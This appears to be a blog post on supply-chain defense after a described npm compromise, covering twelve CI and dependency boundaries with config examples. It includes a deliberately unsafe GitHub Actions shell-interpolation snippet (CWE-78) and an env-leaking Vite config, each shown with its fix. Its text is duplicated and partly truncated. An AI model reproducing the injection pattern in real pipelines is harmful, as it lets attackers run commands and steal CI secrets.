2. Pin to immutable identifier	`package.json` exact + `pnpm install --frozen-lockfile`	`pip-compile --generate-hashes` + `--require-hashes`; or `poetry install --no-update`; or `uv sync --frozen --locked`	`mvn-dependency-lock-plugin` + `dependencies.lock`	`go.sum` + `GOFLAGS=-mod=readonly`	`Cargo.lock` + `cargo --frozen --locked`	`Gemfile.lock` + `bundle config set frozen true`	`packages.lock.json` + `dotnet restore --locked-mode`
2. Cooldown on fresh publishes	`minimumReleaseAge` (pnpm-native)	Renovate `minimumReleaseAge` (covers PyPI); commercial: Socket, Phylum	Renovate (covers Maven Central)	Renovate (covers Go modules) + `govulncheck`	Renovate; `cargo-deny [advisories] yanked = "deny"`	Renovate; `bundler-audit`	Renovate
3. Lockfile integrity	`integrity: sha512:...` per entry	hash via `--require-hashes`; Poetry `content-hash`	Gradle `verification-metadata.xml`; Maven `--strict-checksums`	`go.sum` + `sum.golang.org`	Cargo lockfile checksums (built-in)	`bundle config set verify_files true`	`dotnet trust` for signed packages
4. Lifecycle script gate	`onlyBuiltDependencies` + `--ignore-scripts`	`pip install --only-binary=:all:`	audit `<build><plugins>` + checksum-pin them	`cgo` / `//go:generate` controlled via Bazel/Nix sandbox	`build.rs` sandboxed via Bazel `rules_rust` or `cargo-deny` bans	`bundle config force_ruby_platform true` to skip native; or sandbox	PackageReference (modern) doesn't run scripts; audit any `packages.config` projects
5. Base image digest pin	`FROM image:tag@sha256:...` (any Dockerfile, any language)	same	same	same	same	same	same
6. Image signing	cosign + Sigstore (any registry, any image)	same; PEP 740 attestations + `sigstore` for wheels	same; `sigstore-maven-plugin` for JARs	same; `slsa-github-generator/builder-go` for SLSA	`cargo-dist` + Sigstore	same	`dotnet nuget sign`; NuGet signature verification
7. CI mutable-ref pin	`uses: org/action@<sha>`; `pinact` enforce	(Python doesn't have an "Actions" concept; this is CI-platform, not language)	same	same	same	same	same
8. Default-deny permissions	GHA `permissions: {}`	(CI-platform; see CI table below)	same	same	same	same	same
11. Logger redaction	pino `redact:`	`structlog` processors + `logging.Filter`	Logback `MaskingPatternLayout`	`zap` custom encoder; `zerolog` `.Strs("redacted", ...)`	`tracing` `Layer`	`Rails.config.filter_parameters`	Serilog `Enrichers.Sensitive`
12. Force-pin transitive	`pnpm.overrides`	pip `constraints.txt`; uv `[tool.uv] override-dependencies`; Poetry → promote to direct	Maven `<dependencyManagement>`; Gradle `dependencySubstitution`	`replace` directive in `go.mod`	`[patch.crates-io]` in `Cargo.toml`	Direct `gem 'foo', '1.2.3'` in `Gemfile`	`Directory.Packages.props` central management

CI translations for Boundaries 5–9:

	GitHub Actions	GitLab CI	Buildkite	CircleCI	Jenkins	AWS CodeBuild
Mutable-ref pin (B7)	`uses: org/action@<sha>` + `pinact`	`include: ref: <sha>` + Renovate `gitlabci-include`	Plugin `@<sha>` + Renovate `buildkite`	Inline orbs; or pin `orbs: foo/bar@<exact-version>`	`@Library('foo@<sha>')`	Pre-mirrored installers + checksum verify in `pre_build`
Default-deny perms (B8)	`permissions: {}`	`id_tokens:` per-job; protected variables	Agent-queue ACLs; secrets via Vault Agent	Restricted contexts	`withCredentials` per-step; folder-level isolation	Per-project IAM role; `SECRETS_MANAGER` vars
OIDC trust (B8)	`sub`/`job_workflow_ref` anchored	`CI_JOB_JWT_V2` audience-bound	OIDC plugin since 2023	`circleci/oidc-orb`	Workload identity / `manage-credentials-binding-plugin`	`aws sts assume-role-with-web-identity`
Shell injection (B9)	`actionlint` + `zizmor`	`glab ci lint`; `semgrep p/ci`	`buildkite-pipeline-lint`	`circleci config validate`	Pipeline Linter; `pipeline-utility-steps`	`cfn-lint` + `checkov`
Image signing identity (B6)	OIDC issuer `token.actions.githubusercontent.com`	`CI_JOB_JWT_V2` issuer	Buildkite OIDC issuer	`oidc.circleci.com`	OIDC via plugin or workload identity	CodeBuild OIDC tokens

Cross-cutting tools, alphabetical:

Audit (CVE in deps): pnpm/npm audit → pip-audit (Python), mvn dependency-check:check or Gradle dependencyCheckAnalyze (Java), govulncheck (Go, symbol-aware reachability), cargo audit + cargo-deny (Rust), bundler-audit (Ruby), dotnet list package --vulnerable --include-transitive (.NET). Cross-stack: OSV-Scanner (Google; OSV format covers all of the above), Snyk Open Source, Wiz, Socket.
Cosign: ecosystem-agnostic. Works on any container image and on generic blobs.
gitleaks: stack-agnostic. Alternatives: trufflehog, detect-secrets, GitHub native push protection. Run several; they catch different things.
CodeQL: native multi-language (JS/TS, Python, Java, Kotlin, Go, Ruby, C#, C/C++, Swift). Alternatives: Semgrep Pro (broadest), Snyk Code, SonarCloud, Veracode.
minimumReleaseAge: native in pnpm. Universal via Renovate (minimumReleaseAge config) covers npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform.
SBOM: syft is stack-agnostic. Per-stack: cyclonedx-bom (Python), cyclonedx-maven-plugin (Java), cyclonedx-gomod (Go), cargo cyclonedx (Rust), bundler-cyclonedx (Ruby), dotnet CycloneDX (.NET). Consume with Dependency-Track; scan with Trivy or Grype.

The boundary survives. The YAML changes.

Closing

That grep took eleven seconds. The fix took four lines. The control that catches the next one was one commit.

If you only take three things from this: pin every external CI reference (Action / include / plugin / orb / shared-library) to a content-addressed identifier; scope every CI permission block to least privilege; set a minimumReleaseAge of at least 3 days on your package manager. Put the first two as required status checks on main. Together they would have stopped axios@1.14.1 cold for any pipeline running them, and tj-actions cold for every repo that ran it. The other nine boundaries are the layers behind that.

For a regulated workload healthcare staffing means downtime maps to nurses missing shifts at hospitals, so we weight availability higher than most SaaS the calibration looks like: we tolerated +5 minutes of PR latency, but rejected anything that could block a hotfix at 2am. Your domain's calibration will differ. Write down why.

If you've calibrated minimumReleaseAge differently, I want to hear the number and why especially if you're in fintech or healthcare with stricter patch SLAs. Tell me I'm wrong about any of the trade-offs in the comments. I'd rather argue about the number here than discover the right answer at 2am during a credential-rotation drill because some maintainer's npm token leaked at lunch.

Appendix: minimal viable starter pack

A team that has none of these in place can ship a meaningful subset in roughly a week, regardless of stack:

Lock manifests committed; CI install command refuses to mutate them.
minimumReleaseAge (pnpm) or Renovate equivalent set to ≥ 3 days.
Lifecycle-script default-deny: pnpm.onlyBuiltDependencies allowlist + --ignore-scripts in CI; equivalent gate per stack.
Base images pinned by @sha256: digest. Non-root USER in every production image.
Workflow / pipeline default-deny on permissions; per-job grants.
Mutable references (uses:, include:, plugins, orbs, shared libs) pinned to commit SHAs; CI gate fails un-pinned PRs.
Untrusted CI input passed via env vars, never interpolated into shell.
Image signing via cosign + Sigstore (or stack-equivalent provenance).
PR-time secret scanning (gitleaks / trufflehog).
PR-time dependency CVE gate (pnpm audit + per-stack equivalents above) with documented expiry-forced allowlist.
Logger redaction at framework level for auth headers, cookies, password / token / secret keys.
CODEOWNERS covering every file in this list.

Each item is a few lines of configuration. Total cost is roughly the week described above for a multiple projects monorepo; smaller repos proportionally less. The benefit, in our case, was being able to stop checking my phone on Sundays.

Twelve Trust Boundaries: A Field Guide to Supply-Chain Defense After axios@1.14.1

Ahmad Kanj — Fri, 08 May 2026 12:32:00 +0000

Three hours, on a Monday, during peak CI/CD hours across multiple time zones. Any team running pnpm install or npm install against a ^1.14.0 constraint pulled 1.14.1 automatically. (^1.14.0 means "any 1.x.y ≥ 1.14.0" most package managers express the same idea: ~= in pip, ^ in Cargo, ~> in Gemfile.) No CVE was published during the window. SAST tools had nothing to flag.

axios@1.14.1 added one new transitive dependency (a dependency-of-a-dependency, pulled in indirectly): plain-crypto-js@4.2.1. That package's postinstall script, a hook the package manager runs automatically after install, the canonical Node footgun, with analogues in pip's setup.py build hooks, Ruby's gem extconf, and Cargo's build.rs ran node setup.js, which downloaded a Python-based RAT (Remote Access Trojan) from a C2 (command-and-control) server, exfiltrated environment variables and cloud credentials, and attempted to establish persistence on the build host. The compromise wouldn't have been visible to anyone glancing at the lockfile diff. A new transitive in a stable utility, the kind of churn most teams approve without thinking.

Three hours is forever in CI. By the time npm pulled the version, the bytes had already shipped to thousands of build hosts.

Two weeks before that incident, I was reading through a workflow in our own repo that lets engineers trigger an LLM code review by commenting /review on a pull request. I stopped on this line:

# .github/workflows/opencode-review.yml:108
COMMENT_BODY="${{ github.event.comment.body || '' }}"

Two attacks, very different mechanics. axios was a credential-theft → publish → postinstall chain at the registry boundary. The CWE-78 was a comment-string interpolation at the workflow boundary. The connection: in both cases the attacker didn't write code "in" the repo. They injected code by abusing a trust relationship we trusted axios's npm releases; we trusted GitHub event input. The perimeter is no longer your application. It's everything that runs before, during, and after your build, and the defense has to live in those same places.

Where the attack surface actually lives now

Your application's attack surface is bounded. A handful of endpoints, an auth system, a database. You can audit it, pen-test it, threat-model it on a whiteboard in an afternoon.

The math doesn't work in your favour. A typical mid-sized application resolves on the order of 1,000–3,000 transitive dependencies in its lockfile (the resolved-versions file your package manager writes package-lock.json, Pipfile.lock, Cargo.lock, Gemfile.lock, go.sum). A typical CI pipeline chains 10–30 third-party Actions / plugins. Across a multi-year horizon, the probability that none of those maintainers gets phished, social-engineered or leaks a publish token approaches zero.

Recent incidents to anchor frequency:

2018: event-stream (npm advisory 737): maintainer handed package to a malicious "helpful contributor" who added a payload in a sub-dependency. Targeted exfiltration of private keys from the Copay/copay-dash Bitcoin wallet specifically conditional payload, no effect on other consumers.
2021: ua-parser-js: npm account takeover. Crypto miner and credential theft on every install. ~4 hours before takedown.
2021: codecov bash uploader (CVE-2021-32699): modified upload script harvested CI environment variables. HashiCorp, Twilio, Confluent affected.
2022: node-ipc (CVE-2022-23812): maintainer protestware. Wiped files on Russian and Belarusian IPs.
2024: xz-utils (CVE-2024-3094): multi-year insider. The "Jia Tan" persona spent ~2 years building trust before merging an OpenSSH authentication backdoor via liblzma linkage with a specific Ed448 key. Discovered by Postgres engineer Andres Freund investigating ~500 ms of sshd login latency, before the affected versions reached most stable distributions.
2024: @solana/web3.js (GHSA-7493-mqf3-cv5g): npm token compromise. Wallet drainer in published versions for ~5 hours.
2025: tj-actions/changed-files (CVE-2025-30066): chained through reviewdog/action-setup (CVE-2025-30154) → stolen PAT → retroactive semver-tag rewrite. ~218 repos confirmed leaked secrets out of ~23,000 references per StepSecurity / Wiz post-incident telemetry.
2025: Shai-Hulud npm worm: the first true self-replicating npm worm. A postinstall harvested maintainer npm tokens and re-published the worm into every other package the victim maintained. ~180 packages compromised across multiple maintainer namespaces.
2025: Nx s1ngularity worm: npm postinstall on compromised Nx versions harvested GitHub PATs, SSH keys, and crypto wallets from build hosts; backdoored downstream nx-init- repositories. Directly relevant to anyone on an Nx monorepo.
2026: axios@1.14.1: as above.

The twelve boundaries

Phase 1 Source-side: what enters your repo

Boundary 1: Source → Repository (Who can write to `main`?)

The forge-level (GitHub / GitLab / Bitbucket / Gerrit) primitives differ; the rule is identical: humans cannot push to main; only the merge bot can, and only after policy passes.

Boundary 2: Maintainer → Package (Is this dependency safe?)

Threat: typosquats, dependency confusion (publishing a public package whose name shadows a private one, tricking the resolver), maintainer compromise. axios@1.14.1 is the canonical example of the third published from a stolen credential, malicious for three hours, gone afterwards.

Controls registry-time:

Pin to immutable identifiers. Lockfile committed; exact-version constraints; no caret/tilde ranges in production dependencies; pnpm install --frozen-lockfile (or npm ci, pip install --require-hashes, cargo --frozen --locked, mvn -B verify, bundle install --frozen, dotnet restore --locked-mode) in CI. The general invariant: every dependency entry resolves to a content-addressed artifact, not a URL.
Cooldown on freshly published versions. Reject packages younger than N days, on the premise that fresh-publish malware is detected and yanked within 24–72 hours. The premise has limits xz-utils ran for ~2 years undetected so this control buys hours-to-days of latency, not certainty.

   # pnpm-workspace.yaml value is in minutes; 4320 min = 72 h = 3 days
   minimumReleaseAge: 4320

Provenance. Where available, prefer packages published with provenance attestations. npm publish --provenance (since npm 9.5) records a signed Sigstore provenance entry binding the published tarball to the GitHub Actions workflow that built it. PyPI Trusted Publishers + PEP 740 attestations are the Python equivalent. Maven Central PGP signatures + sigstore-maven-plugin for Java. Provenance doesn't stop a credential-theft attack like axios the malicious workflow would still produce a signed entry but it gives forensics a starting point.

Boundary 3: Registry → Lockfile (Is the resolved artifact what we think it is?)

Threat: registry compromise, off-registry tarballs without integrity, mid-flight tampering.

Controls: lockfile committed; integrity hash (sha512:, sha256:, OCI digest) on every entry; CI install command refuses to mutate the lockfile. Easy thing to miss: a lockfile entry like tarball: https://cdn.somehost.com/foo.tgz without an integrity: field is functionally latest. Audit yours for entries where the hash field is empty or pointing to a URL the registry doesn't verify.

# tools/scripts/verify-supply-chain.sh runs in CI
# Fails if the lockfile contains any off-registry tarball not on this allowlist.
EXPECTED_TARBALLS=(
  "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz"  # SheetJS withdrew xlsx from npm in 2023
)

Boundary 4: Install → Lifecycle scripts (What runs on install?)

Threat: malicious lifecycle hooks. The axios attack's payload ran here. plain-crypto-js@4.2.1's entire malicious behaviour was a postinstall: node setup.js. Without that hook, the package would have sat on disk doing nothing until something require()'d it and axios doesn't import plain-crypto-js. The postinstall was the only thing that turned a passive disk write into RCE during install.

Controls:

Default-deny on install scripts, allowlist of who may run them:

   {
     "pnpm": {
       "onlyBuiltDependencies": [
         "esbuild",
         "@swc/core",
         "@datadog/native-iast-taint-tracking",
         "prisma"
       ]
     }
   }

Behavioural quarantine. Socket and Phylum analyse new transitives for suspicious patterns (network calls, file-system access, dynamic eval) before they reach your lockfile. npq wraps npm install to prompt before installing freshly published packages. None of these would catch a sufficiently subtle payload, but plain-crypto-js's node setup.js → C2 download is exactly the shape they flag.
Build-host sandboxing. Run installs inside an ephemeral container with no network egress except to the registry; or use Bubblewrap / Firejail / Chainguard's hardened images. Defence-in-depth for the case where the lifecycle gate fails open.

Stack equivalents: pip's risky surface is setup.py install hooks (mitigate with --only-binary=:all:); Ruby's is gem install running extconf.rb; Cargo's is build.rs (sandbox via Bazel rules_rust or cargo-deny bans); .NET's modern PackageReference does not run scripts (legacy packages.config does); Maven and Gradle's are build plugins (audit <build><plugins> and buildscript { dependencies }).

Phase 2 Build-side: what runs during your build

Boundary 5: Source → Image (Is our build environment trustworthy?)

Threat: base image tag rewrite, secrets baked into image layers.
Controls:

Pin every FROM by @sha256:<digest>. Tags are mutable; digests are content-addressed (the SHA changes if the bytes change, so a rewrite is detectable).

   FROM node:20.11.1-alpine3.19@sha256:735dd688da64d22ebd9... AS base
   USER node
   CMD ["node", "dist/main.js"]

Drop privileges with USER before CMD. For Node images: USER node. For nginx: switch to nginxinc/nginx-unprivileged (drop-in non-root replacement listening on 8080).
Never put secrets in ARG defaults they persist in docker history. Use BuildKit --mount=type=secret for build-time secrets.
Hermetic builds for the highest tier. Bazel rules_oci, Nix dockerTools, Chainguard's apko + melange produce reproducible images where every byte is content-addressed back to source. Overkill for most teams; required for SLSA L3+.

Boundary 6: Image → Registry (Can downstream verify what we shipped?)

Threat: image tag rewrite at the registry; image swap; "did we actually ship this build?" forensics gap.

Verify with workflow-path anchoring, not a loose org regex:

cosign verify <image>@<digest> \
  --certificate-identity-regexp "^https://github\.com/yourorg/yourrepo/\.github/workflows/release\.yml@refs/heads/main$" \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  --certificate-github-workflow-repository "yourorg/yourrepo" \
  --certificate-github-workflow-ref "refs/heads/main"

Stack-agnostic: cosign works on any container image registry (ECR, GHCR, ACR, GAR, Harbor, Artifactory, Quay) and on generic blobs via cosign sign-blob. Sigstore Fulcio currently trusts OIDC issuers from GitHub, GitLab, Buildkite, CircleCI, Google, Microsoft same cosign sign --identity-token flow, different iss claim. PEP 740 attestations + python -m sigstore cover Python wheels; sigstore-maven-plugin covers Java JARs.

Boundary 7: Tag → Commit (What does this `uses:` / include / plugin actually point to?)

Controls: pin every external uses: to a 40-character commit SHA with a tag comment.

- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
- uses: pulumi/actions@8582a9e8cc630786854029b4e09281acd6794b58 # v6

Enforce in CI with pinact run --check --verify. It fails the PR if anything is unpinned, and flags drift between the pinned SHA and the SHA the upstream tag currently resolves to. It catches inadvertent drift. It does not by itself defeat a tag-rewrite attack pinact will surface the mismatch but cannot tell you which side is hostile. Pair it with a higher-trust signal: Sigstore attestation verification, GitHub's gh attestation verify for Action artifacts (GA 2024), StepSecurity Harden-Runner for egress-policy + tampering detection on the runner, or human review of any flagged drift.

Boundary 8: Workflow → Secrets (What can a single compromised step exfiltrate?)

Threat: any step in a workflow inherits the workflow's permissions and any environment-scoped secrets. A compromised Action running with permissions: write-all receives a GITHUB_TOKEN with write scopes across that repository's API surface contents, issues, pull requests, packages, deployments for the duration of that workflow run.

Controls: default-deny at workflow level, grant per-job:

permissions: {}

jobs:
  deploy:
    permissions:
      contents: read       # for checkout
      id-token: write      # for AWS OIDC

zizmor (free workflow-security linter) audits this on every PR. When we ran it the first time, 8 of our 16 workflows were running permissions: write-all. Today none of them do.

"Condition": {
  "StringEquals": {
    "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
  },
  "StringLike": {
    "token.actions.githubusercontent.com:sub": "repo:yourorg/yourrepo:ref:refs/heads/main"
  }
}

Boundary 9: Untrusted input → Shell (CWE-78 in CI)

Unsafe:

run: echo "Reviewing: ${{ github.event.comment.body }}"

Safe:

env:
  BODY: ${{ github.event.comment.body }}
run: echo "Reviewing: $BODY"

Phase 3 Runtime-side: what ships and what leaks

Boundary 10: Build host env → Client bundle (Whose secrets ship to the browser?)

We had this:

// vite.config.ts
define: {
  'process.env': process.env,   // TODO: fix this later
},

Safe:

define: {
  'process.env.PUBLIC_API_URL': JSON.stringify(process.env.PUBLIC_API_URL),
  // explicit allowlist; nothing implicit
},

Boundary 11: Runtime → Logs (Are your sinks an exfiltration channel?)

Controls: redaction at the framework level (not per call-site):

import pino from 'pino';

export const logger = pino({
  redact: {
    paths: [
      'req.headers.authorization',
      'req.headers.cookie',
      'config.headers.authorization',  // catches Axios errors
      '*.password', '*.token', '*.secret',
    ],
    censor: '[REDACTED]',
  },
});

The limit. pino redact is a denylist; it only scrubs the paths you list. Custom auth headers (x-api-key, x-vault-token), GraphQL variables.password, request.body.token, provider-specific shapes easy to miss. Audit your redact paths against the actual headers and body shapes your services see, and re-audit when you add an integration.

Boundary 12: Dependency → Patch (Can you fix a CVE without a registry round-trip?)

Threat: vulnerable transitive dependency, no maintainer response, can't wait.

Controls: force-pin the transitive with documented rationale and an expiry date:

{
  "pnpm": {
    "overrides": {
      "lodash-es": "4.17.23",
      "tar": "7.5.11"
    }
  }
}

{
  "ghsa": "GHSA-xxxx-yyyy-zzzz",
  "package": "the affected package",
  "severity": "high | critical",
  "rationale": "why this risk is accepted (must explain reachability or absence of fix)",
  "verified_by": "engineer email or handle",
  "added": "YYYY-MM-DD",
  "expires": "YYYY-MM-DD",  // max 90 days
  "follow_up": "what removes this entry"
}

CI fails when expires passes; the gate forces a re-decision rather than letting drift accumulate.

When prevention fails: the response side

Every boundary above is preventive. Some will fail. The question is what you do in the next four hours.

Prevention buys time for detection. Detection buys time for response. Get all three in writing before you need them.

What one week of focused work actually moved

Control	Before	After
Third-party Action SHA pinning	0% of 110 `uses:` lines	100% with `pinact` CI gate
Workflow `permissions: write-all`	8 of 16 workflows	0
Lockfile integrity coverage	99.97% (1 off-registry tarball, no `integrity:`)	99.97% + CI allowlist enforcement with rationale per off-registry entry
`minimumReleaseAge`	12 hours	3 days
Production Dockerfile USER directive	0 of 7 (all root)	7 of 7 (non-root)
Production base image digest pinning	0 of 7	7 of 7
Image signing	none	cosign keyless on every ECR push, workflow-path-anchored verify identity
PR-time secret scanning	pre-commit only (skippable)	pre-commit + CI (unskippable)
PR-time SAST	none	CodeQL `security-extended`
Workflow security audit	none	`actionlint` + `zizmor`
Dependency CVE gate	none	`pnpm audit --prod --audit-level high` with documented allowlist
SBOM generation	none	CycloneDX + SPDX on every push to main

The week wasn't a checklist. It was a sequence of specific findings, in the order I hit them:

Day 1: Boundary 7. Audit of .github/workflows/. Every external uses: was tag-pinned. Pinned all 110 to 40-character SHAs with tag comments. pinact run --check --verify added as required status check.
Day 1: Boundary 8. 8 of 16 workflows ran with permissions: write-all. Tightened to workflow-level permissions: {} plus per-job grants. zizmor added as the gate. First staging deploy broke because permissions: {} revealed an undeclared packages: read that a publish job had been silently inheriting through the old write-all. Caught in PR; one-line add to per-job permissions.
Day 2: Boundary 9. The opencode-review.yml:108 CWE-78 (the lede). Four-line fix.
Day 2: Boundary 10. apps/front/remote-homepage/vite.config.ts:30 had 'process.env': process.env, with a TODO comment. Every CI environment variable visible to the build host was being baked into the client bundle. Replaced with an explicit allowlist.
Day 3: Boundary 8. build-and-publish-service.yml lines 128 and 469: both Wiz container scan steps had continue-on-error: true || true. Doubly non-blocking. Two engineers had to reach for the keyboard to make those scans non-fatal. Removed both bypasses.
Day 3: Boundary 3. Lockfile audit found one off-registry tarball: https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz, in two lambda package.json files. Allowlisted with rationale (SheetJS withdrew xlsx from npm in 2023).
Day 4: Boundary 12. pnpm.overrides audit; the lodash story below.
Day 4: Boundary 2. minimumReleaseAge calibration: started at 720 minutes (12 hours), tried 10080 (7 days), got blocked by a postcss@8.5.12 patch published four days earlier, settled at 4320 (3 days).
Day 4: Boundary 5. Production Dockerfile sweep. 7 of 7 images ran as root. Added USER node; switched nginx-fronted images to nginxinc/nginx-unprivileged.
Day 5: Boundary 6. Cosign keyless signing on every ECR push. Branch protection updated to require all six new gates as status checks.

Five lessons that don't fit in a framework

1. The "patched version" you find in an advisory is not always the version you can ship.

I kept the terminal open and ran:

grep -rE '_\.template\(' apps/ libs/

Nothing. Across multiple projects, no production source called _.template. The vulnerable code path was unreachable.

The decision crystallised: allowlist with documented rationale, three-month expiry, named follow-up to migrate off lodash entirely.

2. Aggressive controls block legitimate fixes. Calibrate, don't posture.

Started at minimumReleaseAge: 10080 (7 days, pnpm's recommended baseline). Within the hour it blocked postcss@8.5.12, a CVE patch published four days earlier. Dropped to 3 days.

3. Detection without enforcement is not security.

Moving those gates into PR-time required-status-checks (same tools, same configurations, just required: true in branch protection) was, in my judgment, the largest delta in actual risk reduction over the week. It's a judgment, not a measurement we don't have a counterfactual. Take it as senior intuition.

4. The blast radius of a CI compromise is usually larger than any application bug.

5. These controls assume a clean threat model. Both halves of that assumption fail.

Most of the controls above assume the attacker is outside your org and your developers' laptops are clean. Both fail in roughly half the supply-chain incidents I've seen written up. xz-utils is the canonical maintainer-side case: a multi-year insider with valid signed commits every Phase 1 control passes. A compromised developer endpoint with a valid signed-commit identity bypasses CODEOWNERS, branch protection, and most of Phase 1. Endpoint posture and maintainer-identity verification are their own conversations. When you decide what to ship next, factor them in.

Process and culture

Tools alone don't get you there. The process around them ends up doing more of the work than I'd expected. Three patterns that bound everything else:

CODEOWNERS on every supply-chain surface. Required reviewer on every workflow file, Dockerfile, dependency manifest, override file, and audit-allowlist.json itself. Humans catch what static analysis can't see (intent, weird ownership, deprecated-but-popular packages); machines catch the rest.
Allowlists with expiry, never silent ignores. Every accepted risk has rationale, verifier, and a date when it stops being accepted. CI fails at expiry and forces a re-decision rather than letting drift accumulate.
Default-deny as engineering culture. permissions: {} at workflow level. Empty Dockerfile USER rejected. New dependency needs CODEOWNERS approval. Off-registry tarball needs written rationale. The friction surfaces decisions that would otherwise stay implicit.

What you can ship alone vs. what needs platform

Translation table: the boundaries in your stack

This article uses pnpm + GitHub Actions because that's where I shipped the work. The boundaries don't care about the YAML.

Boundary	pnpm/JS	Python	Java/Maven	Go	Rust	Ruby	.NET
2. Pin to immutable identifier	`package.json` exact + `pnpm install --frozen-lockfile`	`pip-compile --generate-hashes` + `--require-hashes`; or `poetry install --no-update`; or `uv sync --frozen --locked`	`mvn-dependency-lock-plugin` + `dependencies.lock`	`go.sum` + `GOFLAGS=-mod=readonly`	`Cargo.lock` + `cargo --frozen --locked`	`Gemfile.lock` + `bundle config set frozen true`	`packages.lock.json` + `dotnet restore --locked-mode`
2. Cooldown on fresh publishes	`minimumReleaseAge` (pnpm-native)	Renovate `minimumReleaseAge` (covers PyPI); commercial: Socket, Phylum	Renovate (covers Maven Central)	Renovate (covers Go modules) + `govulncheck`	Renovate; `cargo-deny [advisories] yanked = "deny"`	Renovate; `bundler-audit`	Renovate
3. Lockfile integrity	`integrity: sha512:...` per entry	hash via `--require-hashes`; Poetry `content-hash`	Gradle `verification-metadata.xml`; Maven `--strict-checksums`	`go.sum` + `sum.golang.org`	Cargo lockfile checksums (built-in)	`bundle config set verify_files true`	`dotnet trust` for signed packages
4. Lifecycle script gate	`onlyBuiltDependencies` + `--ignore-scripts`	`pip install --only-binary=:all:`	audit `<build><plugins>` + checksum-pin them	`cgo` / `//go:generate` controlled via Bazel/Nix sandbox	`build.rs` sandboxed via Bazel `rules_rust` or `cargo-deny` bans	`bundle config force_ruby_platform true` to skip native; or sandbox	PackageReference (modern) doesn't run scripts; audit any `packages.config` projects
5. Base image digest pin	`FROM image:tag@sha256:...` (any Dockerfile, any language)	same	same	same	same	same	same
6. Image signing	cosign + Sigstore (any registry, any image)	same; PEP 740 attestations + `sigstore` for wheels	same; `sigstore-maven-plugin` for JARs	same; `slsa-github-generator/builder-go` for SLSA	`cargo-dist` + Sigstore	same	`dotnet nuget sign`; NuGet signature verification
7. CI mutable-ref pin	`uses: org/action@<sha>`; `pinact` enforce	(Python doesn't have an "Actions" concept; this is CI-platform, not language)	same	same	same	same	same
8. Default-deny permissions	GHA `permissions: {}`	(CI-platform; see CI table below)	same	same	same	same	same
11. Logger redaction	pino `redact:`	`structlog` processors + `logging.Filter`	Logback `MaskingPatternLayout`	`zap` custom encoder; `zerolog` `.Strs("redacted", ...)`	`tracing` `Layer`	`Rails.config.filter_parameters`	Serilog `Enrichers.Sensitive`
12. Force-pin transitive	`pnpm.overrides`	pip `constraints.txt`; uv `[tool.uv] override-dependencies`; Poetry → promote to direct	Maven `<dependencyManagement>`; Gradle `dependencySubstitution`	`replace` directive in `go.mod`	`[patch.crates-io]` in `Cargo.toml`	Direct `gem 'foo', '1.2.3'` in `Gemfile`	`Directory.Packages.props` central management

CI translations for Boundaries 5–9:

	GitHub Actions	GitLab CI	Buildkite	CircleCI	Jenkins	AWS CodeBuild
Mutable-ref pin (B7)	`uses: org/action@<sha>` + `pinact`	`include: ref: <sha>` + Renovate `gitlabci-include`	Plugin `@<sha>` + Renovate `buildkite`	Inline orbs; or pin `orbs: foo/bar@<exact-version>`	`@Library('foo@<sha>')`	Pre-mirrored installers + checksum verify in `pre_build`
Default-deny perms (B8)	`permissions: {}`	`id_tokens:` per-job; protected variables	Agent-queue ACLs; secrets via Vault Agent	Restricted contexts	`withCredentials` per-step; folder-level isolation	Per-project IAM role; `SECRETS_MANAGER` vars
OIDC trust (B8)	`sub`/`job_workflow_ref` anchored	`CI_JOB_JWT_V2` audience-bound	OIDC plugin since 2023	`circleci/oidc-orb`	Workload identity / `manage-credentials-binding-plugin`	`aws sts assume-role-with-web-identity`
Shell injection (B9)	`actionlint` + `zizmor`	`glab ci lint`; `semgrep p/ci`	`buildkite-pipeline-lint`	`circleci config validate`	Pipeline Linter; `pipeline-utility-steps`	`cfn-lint` + `checkov`
Image signing identity (B6)	OIDC issuer `token.actions.githubusercontent.com`	`CI_JOB_JWT_V2` issuer	Buildkite OIDC issuer	`oidc.circleci.com`	OIDC via plugin or workload identity	CodeBuild OIDC tokens

Cross-cutting tools, alphabetical:

Audit (CVE in deps): pnpm/npm audit → pip-audit (Python), mvn dependency-check:check or Gradle dependencyCheckAnalyze (Java), govulncheck (Go, symbol-aware reachability), cargo audit + cargo-deny (Rust), bundler-audit (Ruby), dotnet list package --vulnerable --include-transitive (.NET). Cross-stack: OSV-Scanner (Google; OSV format covers all of the above), Snyk Open Source, Wiz, Socket.
Cosign: ecosystem-agnostic. Works on any container image and on generic blobs.
gitleaks: stack-agnostic. Alternatives: trufflehog, detect-secrets, GitHub native push protection. Run several; they catch different things.
CodeQL: native multi-language (JS/TS, Python, Java, Kotlin, Go, Ruby, C#, C/C++, Swift). Alternatives: Semgrep Pro (broadest), Snyk Code, SonarCloud, Veracode.
minimumReleaseAge: native in pnpm. Universal via Renovate (minimumReleaseAge config) covers npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform.
SBOM: syft is stack-agnostic. Per-stack: cyclonedx-bom (Python), cyclonedx-maven-plugin (Java), cyclonedx-gomod (Go), cargo cyclonedx (Rust), bundler-cyclonedx (Ruby), dotnet CycloneDX (.NET). Consume with Dependency-Track; scan with Trivy or Grype.

The boundary survives. The YAML changes.

Closing

That grep took eleven seconds. The fix took four lines. The control that catches the next one was one commit.

If you only take three things from this: pin every external CI reference (Action / include / plugin / orb / shared-library) to a content-addressed identifier; scope every CI permission block to least privilege; set a minimumReleaseAge of at least 3 days on your package manager. Put the first two as required status checks on main. Together they would have stopped axios@1.14.1 cold for any pipeline running them, and tj-actions cold for every repo that ran it. The other nine boundaries are the layers behind that.

Appendix: minimal viable starter pack

A team that has none of these in place can ship a meaningful subset in roughly a week, regardless of stack:

Lock manifests committed; CI install command refuses to mutate them.
minimumReleaseAge (pnpm) or Renovate equivalent set to ≥ 3 days.
Lifecycle-script default-deny: pnpm.onlyBuiltDependencies allowlist + --ignore-scripts in CI; equivalent gate per stack.
Base images pinned by @sha256: digest. Non-root USER in every production image.
Workflow / pipeline default-deny on permissions; per-job grants.
Mutable references (uses:, include:, plugins, orbs, shared libs) pinned to commit SHAs; CI gate fails un-pinned PRs.
Untrusted CI input passed via env vars, never interpolated into shell.
Image signing via cosign + Sigstore (or stack-equivalent provenance).
PR-time secret scanning (gitleaks / trufflehog).
